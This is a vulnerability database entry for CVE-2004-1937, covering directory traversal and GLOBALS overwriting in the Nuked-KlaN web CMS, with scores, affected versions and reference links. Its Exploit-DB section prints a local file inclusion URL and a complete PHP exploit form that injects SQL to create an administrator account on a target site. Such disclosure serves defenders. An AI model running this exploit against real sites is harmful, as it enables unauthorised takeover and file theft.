CVE-2004-1937
CVSS 5.0
Published: 2004-12-31 00:00:00
Modified: 2016-10-17 23:03:20

[Original] Multiple directory traversal vulnerabilities in Nuked-KlaN 1.4b and 1.5b allow remote attackers to read or include arbitrary files via .. sequences in (1) the user_langue parameter to index.php or (2) the langue parameter to update.php, or modify arbitrary GLOBAL variables by causing globals.php to be loaded before conf.inc.php via (3) .. sequences in the file parameter with the page parameter set to globals, or (4) ../globals.php in the user_langue parameter, as demonstrated by modifying $nuked[prefix] in the Suggest module.


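[CNNVD] Nuked-Klan Multiple Vulnerabilities (CNNVD-200412-347)

Nuked-KlaN versions 1.4b and 1.5b contain multiple directory traversal vulnerabilities. Remote attackers can read or include arbitrary files via (1) the user_langue parameter to index.php or (2) the langue parameter to update.php, or modify arbitrary GLOBAL variables by causing globals.php to be loaded before conf.inc.php via (3) .. sequences in the file parameter with the page parameter set to globals, or (4) ../globals.php in the user_langue parameter.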

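- CVSS (Base Score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (Affected Platforms and Products)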

cpe:/a:nuked-klan:nuked-klan:1.2_beta
cpe:/a:nuked-klan:nuked-klan:1.5
cpe:/a:nuked-klan:nuked-klan:1.4
cpe:/a:nuked-klan:nuked-klan:1.3
cpe:/a:nuked-klan:nuked-klan:1.2
cpe:/a:nuked-klan:nuked-klan:1.5_sp2
cpe:/a:nuked-klan:nuked-klan:1.3_beta

- OVAL (Technical Details for Detection)

No related OVAL definitions found

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1937
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1937
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-347
(Official data source) CNNVD

- Other Links and Resources

http://marc.info/?l=bugtraq&m=108222826225823&w=2
(UNKNOWN)  BUGTRAQ  20040417 [SCSA-028] Nuked-Klan Multiple Vulnerabilities
http://www.phpsecure.info/v2/tutos/frog/Nuked-KlaN.txt
(PATCH)  MISC  http://www.phpsecure.info/v2/tutos/frog/Nuked-KlaN.txt
http://www.securityfocus.com/bid/10104
(PATCH)  BID  10104
http://xforce.iss.net/xforce/xfdb/15843
(UNKNOWN)  XF  nuked-klan-file-include(15843)
http://xforce.iss.net/xforce/xfdb/15844
(UNKNOWN)  XF  nuked-klan-configurtion-corruption(15844)

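- Vulnerability Information

Nuked-Klan Multiple Vulnerabilities
Medium risk  Path traversal
2004-12-31 00:00:00 2005-10-20 00:00:00
Remote
Nuked-KlaN versions 1.4b and 1.5b contain multiple directory traversal vulnerabilities. Remote attackers can read or include arbitrary files via (1) the user_langue parameter to index.php or (2) the langue parameter to update.php, or modify arbitrary GLOBAL variables by causing globals.php to be loaded before conf.inc.php via (3) .. sequences in the file parameter with the page parameter set to globals, or (4) ../globals.php in the user_langue parameter.

- Advisories and Patches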

        The vendor has reportedly released a fix for these issues, though this has not been confirmed by Symantec. Affected users should contact the vendor for more information.
        ---
        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- Vulnerability Information (23988)

Nuked-Klan 1.x Multiple Vulnerabilities (EDBID:23988)
php webapps
2004-04-12 Verified
0 frog
N/A [Download]
source: http://www.securityfocus.com/bid/10104/info

Nuked-Klan is prone to multiple vulnerabilities. These issues include information disclosure via inclusion of local files, an issue that may permit remote attackers to corrupt configuration files and an SQL injection vulnerability.

- To include a local file:

http://www.example.com/index.php?user_langue=../../../../../file/to/view

- Create admin (overwriting GLOBALS) :

-------------------------------------------------------

<html>
<head>
<title>Nuked-KlaN b1.5 Create Admin</title>
</head>
<body>
<?
function ascii_sql($str) {
for ($i=0;$i < strlen($str);$i++) {
if ($i == strlen($str)-1){
$ascii_char.=ord(substr($str,$i));
}else{
$ascii_char.=ord(substr($str,$i)).',';
}
}
return $ascii_char;
}

if (isset($_POST["submit"])){

echo "<script>url='".$target."/index.php?
file=Suggest&op=add_sug&user_langue=../globals.php&nuked[prefix]=nuked_users%20
(id,pseudo,pass,niveau)%20VALUES%20(12345,char(".ascii_sql($_POST
["pseudo"])."),md5(char(".ascii_sql($_POST
["pass"]).")),9)/*&module=Gallery';window.open(url);</script>";
echo "<br><br><br><br>Admin should have been created.";

}else{
?>

<form method="POST" action="<? echo $PHP_SELF; ?>">
<b>Target :</b> <input type="text" name="target" value="http://"><br>
<b>Admin Nick :</b> <input type="text" name="pseudo"><br>
<b>Admin Pass :</b> <input type="text" name="pass"><br>
<input type="submit" name="submit" value="Create Admin">
</form>
<?
}
?>
</body>
</html>
-------------------------------------------------------		

- Vulnerability Information

52890
Nuked-Klan index.php user_langue Parameter Traversal Arbitrary File Access
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality
Exploit Public

- Vulnerability Description

- Timeline

2004-04-17 Unknown
Unknown Unknown

- Solution

Products

Unknown or Incomplete

- Related References

- Vulnerability Author

Unknown or Incomplete